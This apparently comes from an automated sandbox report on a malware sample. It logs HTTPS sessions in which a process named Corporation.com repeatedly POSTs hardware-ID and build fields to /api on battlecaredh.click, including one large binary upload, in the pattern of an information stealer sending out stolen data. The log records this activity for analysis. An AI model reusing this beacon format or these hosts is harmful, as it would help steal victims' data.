                                                                                                                                                  Data Ascii: --HOYDKW4DIContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--HOYDKW4DIContent-Disposition: form-data; name="pid"3--HOYDKW4DIContent-Disposition: form-data; name="lid"hRjzG3--TRON--HOYDKW4DIContent-Dispo
                                                                                                                                                  2024-12-29 15:36:52 UTC5051OUTData Raw: 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7
                                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                  2024-12-29 15:36:54 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:53 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=1koe95n2h3vv5mhfkgih9l83f0; expires=Thu, 24 Apr 2025 09:23:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBm7mu1NXn%2FJomAkPBkGq5%2BwIvF0zalk09suzytm1ReCWplMnVRQXNXKjeOtQ8ssbUUAUU%2FuvmEz09dNNznL5Qw%2B1PZVln3CLlsOdHBMAZLC4bvtnquMTRLQoLb0Y5TfIb%2BqVl8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade431a224344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1666&rtt_var=651&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21337&delivery_rate=1752701&cwnd=47&unsent_bytes=0&cid=41d459b910b47cf9&ts=1308&x=0"
                                                                                                                                                  2024-12-29 15:36:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                  2024-12-29 15:36:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.449745104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:55 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=36H0OO2IVOZ52O767
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 7123
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:55 UTC7123OUTData Raw: 2d 2d 33 36 48 30 4f 4f 32 49 56 4f 5a 35 32 4f 37 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 33 36 48 30 4f 4f 32 49 56 4f 5a 35 32 4f 37 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 36 48 30 4f 4f 32 49 56 4f 5a 35 32 4f 37 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d
                                                                                                                                                  Data Ascii: --36H0OO2IVOZ52O767Content-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--36H0OO2IVOZ52O767Content-Disposition: form-data; name="pid"1--36H0OO2IVOZ52O767Content-Disposition: form-data; name="lid"hRjzG3--TRON--
                                                                                                                                                  2024-12-29 15:36:56 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:56 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=0tu547ej1g2idvrfh2ps2heh60; expires=Thu, 24 Apr 2025 09:23:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uLLYl9%2FexAB0bs4rDeEITx%2BTORHnz9Y4grotf%2Btbw1TbVlyjXdI%2BmINmwKSoVLGrHYxgLDBreqv5OjWYlNazwieu027agBDgkgyZFEGPsS6XI1W5wDzFPOXv8LmvDqPnoG02%2BXo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade545a784344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1666&rtt_var=626&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=8041&delivery_rate=1752701&cwnd=47&unsent_bytes=0&cid=31b43b9c75c35c01&ts=776&x=0"
                                                                                                                                                  2024-12-29 15:36:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                  2024-12-29 15:36:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.449746104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:36:57 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=6NSHD4N7A9IN
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 1222
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:36:57 UTC1222OUTData Raw: 2d 2d 36 4e 53 48 44 34 4e 37 41 39 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 36 4e 53 48 44 34 4e 37 41 39 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4e 53 48 44 34 4e 37 41 39 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 36 4e 53 48 44 34 4e 37 41 39 49 4e 0d 0a 43
                                                                                                                                                  Data Ascii: --6NSHD4N7A9INContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--6NSHD4N7A9INContent-Disposition: form-data; name="pid"1--6NSHD4N7A9INContent-Disposition: form-data; name="lid"hRjzG3--TRON--6NSHD4N7A9INC
                                                                                                                                                  2024-12-29 15:36:58 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:36:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=bsk7vu242hsh8stdiofi3fjdf9; expires=Thu, 24 Apr 2025 09:23:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbDEL4fZGqDHOClBVcVDrTh53m%2FvrCCB3teUuYfan5l6RkQCO51cr5XGkELXC5yapeaCaR0YJT%2B3xSWHgaShmRp%2FN9vPpCpHjSg2t3kGhUbQ5UNfDVFhHrMt27HWU9Evo1xr7B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade61c8c44344-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1618&rtt_var=624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=2135&delivery_rate=1730883&cwnd=47&unsent_bytes=0&cid=fbab05c0657cd85e&ts=822&x=0"
                                                                                                                                                  2024-12-29 15:36:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                  2024-12-29 15:36:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.449747104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:37:00 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=0CWBWYN6H
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 583211
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 2d 2d 30 43 57 42 57 59 4e 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 30 43 57 42 57 59 4e 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 43 57 42 57 59 4e 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 30 43 57 42 57 59 4e 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                  Data Ascii: --0CWBWYN6HContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--0CWBWYN6HContent-Disposition: form-data; name="pid"1--0CWBWYN6HContent-Disposition: form-data; name="lid"hRjzG3--TRON--0CWBWYN6HContent-Dispo
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 77 24 c4 aa 81 ff 39 1f bb a9 e5 64 09 72 1f e9 78 26 40 93 91 8a 81 43 a3 28 46 bc 99 8f 21 a2 21 31 a3 25 ec 70 c2 fe c9 9d 0b 15 2d 62 b0 0f f8 2e 6b 82 cb 55 22 fd 1b cb bd 59 78 16 e0 44 c8 1a fb 1e 99 1c d0 d4 fd f9 27 25 40 96 0b 04 7e 4b 8e cc c1 7a a5 b3 9d 82 f1 8b 76 c0 ad 44 f5 71 97 71 90 6a d5 c3 2d 82 ef 11 de ed 48 12 ac fe 6f 70 11 0a b5 fb 78 a4 c5 c9 cc 8c cb 50 50 c0 19 d5 af cd c2 2d ab 48 24 17 3a 18 64 46 50 ef 82 e4 2e 7b 37 fc 9b 7e 05 49 97 95 c3 c3 91 a7 82 5a 5d a6 85 bb 5d 14 69 71 9f 43 d5 ab 5a 7d a9 ba ed b2 1f af d8 6b 83 15 f1 8a 73 f6 22 9f 0f 45 5e f5 97 21 48 91 25 47 82 38 a7 8b 0a 55 1d 1a 48 ed e8 6b b4 9c 16 1f a1 83 fa 36 03 db 6f e7 ed f4 b9 e8 91 bb 66 69 41 9c a0 87 ff de 38 81 be fd f9 2e f2 84 ee ab 0b 49 d6
                                                                                                                                                  Data Ascii: w$9drx&@C(F!!1%p-b.kU"YxD'%@~KzvDqqj-HopxPP-H$:dFP.{7~IZ]]iqCZ}ks"E^!H%G8UHk6ofiA8.I
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 04 0c 01 a5 91 37 f3 71 bd 7e 05 c2 0d 95 ba fb 09 53 6c 57 05 8a 0b dd 89 ed bb ec 38 7d 1e c1 c1 e5 96 5d d8 8e 6a d2 92 2c c1 9f 79 1e 3e e7 5e 3f c3 73 47 c6 67 71 86 49 4c cb 11 9c 3d be 1c c7 f6 d5 14 c1 c9 ba df 47 aa 13 89 54 dd 2a c6 fc bc be ef e6 5b 23 b3 c2 72 35 c0 56 15 e2 dd ab 49 92 f8 8b d9 75 6c 81 25 46 51 d8 ea 7c 80 3f 17 d2 b3 dd 72 95 0f d1 e0 b0 7b e9 eb c1 a6 90 23 85 9f d5 1a e7 89 cd 09 e8 b6 cf 20 43 38 1c df cf 3f ad fa 9f 8b ec cb 86 aa 7e ad 06 a3 e1 42 98 8d 1b c7 44 ea e5 26 a9 56 a8 08 6f ce b9 47 53 3b fc 6d 9f c9 99 6e a0 4c 0d a5 3e 91 67 d6 75 2e 2c 6e f8 ff 9d 1d 3f d7 ed 84 30 d4 64 5f 16 07 19 c7 da d9 55 89 47 99 8a 09 7b ab da 15 90 bc bd 94 44 d9 20 ab f5 6f 3e 43 92 ce 5a 92 bb 41 7e 4f ed ce ab bc b0 cf c4 9c
                                                                                                                                                  Data Ascii: 7q~SlW8}]j,y>^?sGgqIL=GT*[#r5VIul%FQ|?r{# C8?~BD&VoGS;mnL>gu.,n?0d_UG{D o>CZA~O
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: cd 33 bc 6c ba fc f7 e8 76 78 91 45 fe be 5b 21 c1 3c 44 ed f5 d6 9d ae 83 b2 9c 16 34 38 af f2 67 58 e9 cd e7 d7 98 3f 4f 79 6f 08 90 4e 40 3c 45 69 90 d4 3f ff 54 31 ad 33 9d c1 c3 6d c3 27 a6 af 37 83 a1 74 3e fc cc 3d e8 40 e9 80 6d f5 c5 0b b7 b7 ac 61 5f d5 ca 17 ca 13 4e 94 ac c3 58 a7 33 6a a0 5b 4b 2b 9b de ba c2 98 77 8a 1e 3d a5 c7 25 5a a4 c9 f8 94 39 d3 54 f9 17 90 54 ca 97 29 86 d6 31 e8 b6 12 76 94 f1 5f 7d 5c 61 2b 2f 03 4e b0 9d 36 0d 9e f1 b6 ea 35 d8 39 37 c5 be da bd 1f 87 c1 e4 f7 ca 51 b9 09 4e 77 d8 7d ec e9 54 60 68 4c eb 51 b9 d1 ca 8d 9d e9 f9 4c 94 66 c9 5a 2d 73 61 7a 5f 08 fb 93 ec bf c6 e2 62 64 d6 a9 e5 52 e7 15 60 f1 0f a7 4a ef 93 21 9c 0b be 39 fb fe 82 5b 72 aa e2 07 5e 15 01 4e cf c0 69 80 de f8 ca 39 cb 5e d8 d9 ff ba
                                                                                                                                                  Data Ascii: 3lvxE[!<D48gX?OyoN@<Ei?T13m'7t>=@ma_NX3j[K+w=%Z9TT)1v_}\a+/N6597QNw}T`hLQLfZ-saz_bdR`J!9[r^Ni9^
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 5b 8d b9 a2 3f 01 2e 4d 5a 8d b1 47 d3 2c d9 23 e9 d8 78 c4 63 db 8b b7 1b 7b 54 9d 37 8c 4e 81 36 1a 5f c7 fa b0 ed 5b a9 ee 17 e1 79 2a 1a 50 d1 cf 24 42 02 68 93 8c 24 9e 70 e0 41 f5 2a e4 44 e2 10 64 6f 70 97 3f 9f 06 47 d4 87 f7 2c 9e 06 e6 07 71 a7 f1 52 db 9d fe a1 25 8d 1b aa 74 f9 c7 84 c9 f9 0c fe 44 a6 e6 de 1c 0c 97 3b 6b c2 5c 95 aa 74 9b 13 22 15 4e bc cf c6 a9 9d 98 b1 e0 37 ba ee 85 e8 54 6f ba ad b6 20 72 a4 81 ec 20 00 8e 8c c5 fc 64 73 4d 49 d7 8e 6e 1a cb e5 31 ef e9 66 55 fe e3 8f ff 14 71 4b 2e 09 cc b4 ee 50 cd 85 04 eb 88 1e 98 e1 0c 8f 2b 0a 21 ad d8 a5 b9 13 a2 70 cf b4 2f 98 97 39 39 fd 5b 9a 5c d2 e8 fc 65 15 fe e7 0c 21 4e f8 7f 87 2f 52 a1 aa bd 3e 3a 2b f9 57 47 e1 e0 13 5f 46 13 1f d8 19 76 58 b2 56 77 46 89 6e 7d f8 f8 f5
                                                                                                                                                  Data Ascii: [?.MZG,#xc{T7N6_[y*P$Bh$pA*Ddop?G,qR%tD;k\t"N7To r dsMIn1fUqK.P+!p/99[\e!N/R>:+WG_FvXVwFn}
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 5a b8 4e a4 81 98 9e c2 69 ec c9 2f c3 78 c5 b4 c2 c0 78 33 de 18 ef 58 b7 43 7b 76 9e 36 e9 0a cc f7 82 30 c0 5c cb db 57 bd 3a 8f c0 80 93 03 e4 7e 09 5d 67 21 2a ed d9 fc 6c ab c5 dd eb 87 09 80 f2 45 60 fc 76 e0 4e 33 3e c0 cd 28 d2 eb 21 f2 cb 06 28 13 01 e6 4a 51 52 ea dc c5 7e ea 32 64 b0 7d ac 67 fb cd 88 e7 39 7a f1 7c 1a 48 c9 ea 64 01 95 be 84 16 a1 ce 23 22 ff 3b fb 11 4f 75 c2 c3 a8 57 ff 77 da cb f9 77 42 47 81 8d de f2 c6 db bb 5d 33 6f ef b2 5f ec 6f b2 4a 74 9d dc 2c 7a b5 6e 3d 2e 50 5f 39 c2 2f 7f 83 52 31 97 9c 8b 77 f8 7a 13 9d fb b2 27 ef 63 13 af db 22 82 2e 98 b6 6a 79 81 8f 96 1f 47 b2 0c 0f 0c 8b 0c ba cd 03 60 2c 92 d0 48 72 37 08 10 bf 4c 9e 61 73 2b bc e1 fb 43 82 d5 ba 62 58 d3 93 61 7f f6 d8 20 39 e2 e2 3c 45 24 f0 be 10 d6
                                                                                                                                                  Data Ascii: ZNi/xx3XC{v60\W:~]g!*lE`vN3>(!(JQR~2d}g9z|Hd#";OuWwwBG]3o_oJt,zn=.P_9/R1wz'c".jyG`,Hr7Las+CbXa 9<E$
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 77 03 90 5a 2b 64 fe e7 6d 3d 04 24 c1 3c 16 4c 38 d4 7f 30 7a 33 c4 db e9 54 dc ea dd cc 57 69 70 63 c8 10 e0 a1 6a 63 95 81 d9 49 f4 95 bb 38 e9 70 04 e6 2d 56 e4 bd 80 80 47 c9 66 ea e9 e0 e4 97 fc ff ef 59 af 77 a7 d6 65 40 97 10 eb 0e 57 59 9e 2e e6 99 72 7d 43 d1 14 e2 f2 ae 13 e7 97 b4 98 b9 69 0f 0e 20 2f 4c b9 fe ad 21 22 c1 c7 59 8b 38 24 f9 18 a5 72 ae f4 ee ad ea d7 bf 85 51 5c d4 9b b6 7a 02 67 cb ec 7e ac 42 b1 1b cf d8 83 53 fc d8 7f 02 d9 c3 15 89 40 83 67 ee b4 91 25 2e a4 b2 b7 b4 fa 36 45 ee 72 b0 2e 3a 7e 72 06 f3 e5 89 93 0c ef de 01 ab 7c 6b 24 ca 65 57 8f 12 66 dc 03 6f 4c 28 e1 94 9c b4 26 ae d7 ef 50 94 cf d9 a3 c0 b7 fc e5 9b d6 a5 09 67 a5 ba 99 b9 8e 63 a8 90 2d 87 7b 8e 54 85 37 95 c8 00 e0 df b5 9c 49 0b ed b7 f8 61 32 b5 ff
                                                                                                                                                  Data Ascii: wZ+dm=$<L80z3TWipcjcI8p-VGfYwe@WY.r}Ci /L!"Y8$rQ\zg~BS@g%.6Er.:~r|k$eWfoL(&Pgc-{T7Ia2
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 3f 47 81 b6 0f 2f a5 64 af f2 e8 83 4f f0 c1 16 8a 34 ac 0e 5e 08 25 e6 98 65 9f 3e e6 28 db 2e c6 d9 3a 99 21 91 d8 9c c0 67 af 79 a3 bf 5e 56 a2 b1 9d 18 aa 35 c9 7e 2f 32 71 ba e2 c8 1f 53 3e 7f 7b 96 ad 64 ff d5 54 df 75 f3 7f 69 17 43 09 d7 1a d8 6a 9d c3 62 da 79 9c 95 2d 02 0d 26 e7 c5 ab dc ac e0 29 63 33 bf c5 b9 fa 20 14 03 07 7d 7a 25 36 d4 4c 0e 5e c9 f8 34 84 df b7 81 58 19 0c 8e 1a 96 b1 ee a1 0b 0a 95 a2 56 5e b7 4a d5 cb e6 15 ad bd 61 2d 16 b8 c5 62 df ba 34 97 f0 b0 b3 17 ef 51 d0 b0 a1 51 a2 0e 15 d7 54 35 85 91 a1 76 88 2d 84 f1 cd 12 14 c4 bd 25 9a 3a 6a 45 d4 31 f3 e1 b4 08 46 5f 24 00 f2 a4 f3 eb 28 4d d0 52 ec 25 3d 7a b4 8f d1 be ca 27 42 8d 08 54 cd cf e8 5c 0f c4 ed 09 db 8c 32 98 91 58 c2 95 95 8a 87 c8 7e a3 3a 8d 42 8f 88 11
                                                                                                                                                  Data Ascii: ?G/dO4^%e>(.:!gy^V5~/2qS>{dTuiCjby-&)c3 }z%6L^4XV^Ja-b4QQT5v-%:jE1F_$(MR%=z'BT\2X~:B
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 98 fa a8 a6 3f ca 1f f7 72 8c 15 8c da 03 68 c5 37 7f 0c bd 68 40 2e 20 7f 8a 13 60 93 ec ca 41 d7 51 de 9f 60 f2 e4 8c f9 e1 79 6f 21 9f e3 14 ab 20 03 a4 9d 1a 53 5e 68 1b 68 ed d4 52 a4 13 5c a1 a1 64 4d 26 08 4d 42 67 a1 49 d1 02 c8 f5 d7 4f 6d 33 3e c7 62 0a 76 c8 a6 11 38 34 91 41 45 b7 c7 13 5a e8 db 01 03 63 2e d2 a5 4a f1 4e 7f 7f 5f 17 fa 5e a1 bc ee a7 b4 1a 60 77 15 75 ac 52 19 22 b9 82 1f 62 57 47 b9 3a ca d9 1c 68 15 2c 95 c4 db 13 6a ce 50 0d 11 72 e8 57 42 89 a2 e4 e9 93 c0 26 2f 33 9f 5a b2 9e 17 c5 d6 e1 25 70 f8 af 25 aa 90 15 be db cc ef 3f 35 f8 40 c9 9a fb 53 6d 12 e5 72 2a a7 20 3a cf 90 87 15 11 43 c7 7f 09 d5 13 75 87 48 2c 0a ba d1 90 1e bf 8d 5a 13 00 2d f9 eb 07 84 46 23 25 66 07 15 ad f5 51 e7 b0 cf 3d 2a 7d 05 ce 2c af 1d 85
                                                                                                                                                  Data Ascii: ?rh7h@. `AQ`yo! S^hhR\dM&MBgIOm3>bv84AEZc.JN_^`wuR"bWG:h,jPrWB&/3Z%p%?5@Smr* :CuH,Z-F#%fQ=*},
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 28 fb 64 10 e4 7e b7 4c de 5c b5 6b df b8 17 f7 a5 cf 00 97 92 52 3a 94 90 52 5a 6b c9 fc 8b d7 f6 49 8e d7 f6 bd 7c 5a a1 31 c4 c5 9a 3e 53 20 88 4a 9e 3f f7 91 f7 ae a2 21 a4 9d 37 cb 53 09 5d e9 f2 fa 14 93 10 dc b7 71 a3 57 f1 23 6b d2 a1 f7 b9 90 97 af d6 31 a3 a6 77 9c 36 ae 20 f6 85 04 c1 07 4a fd e2 ce 74 92 10 c3 21 80 29 07 4d a7 ef 67 c7 71 3c 7d 85 42 f7 37 5a 32 cb 7a b7 d3 4b 7c 7b d0 b0 d7 fa 49 7d cf f3 a5 bd ef 28 73 77 7b f4 5d de f7 2c ae 56 f8 3d 35 9d ab 28 3e 4a 31 ab f4 70 9c 57 f8 d8 8f 24 c3 cc 8f 03 17 26 9a f6 17 df dc ef e1 ef 95 eb 34 d1 fe b9 bc 33 bc f2 23 07 b5 29 87 29 be 06 89 cd 6f b4 ba 7f f0 01 d6 77 30 d9 d4 f4 e6 7f dd 45 45 22 60 49 89 5f 37 74 6d f6 8b 03 92 a3 f7 bb bd f7 01 ad aa e4 55 61 77 44 1c c4 35 6f 9b e3
                                                                                                                                                  Data Ascii: (d~L\kR:RZkI|Z1>S J?!7S]qW#k1w6 Jt!)Mgq<}B7Z2zK|{I}(sw{],V=5(>J1pW$&43#))ow0EE"`I_7tmUawD5o
                                                                                                                                                  2024-12-29 15:37:02 UTC1143INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=k5fp9c0tq69a04elb6dqer74n3; expires=Thu, 24 Apr 2025 09:23:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
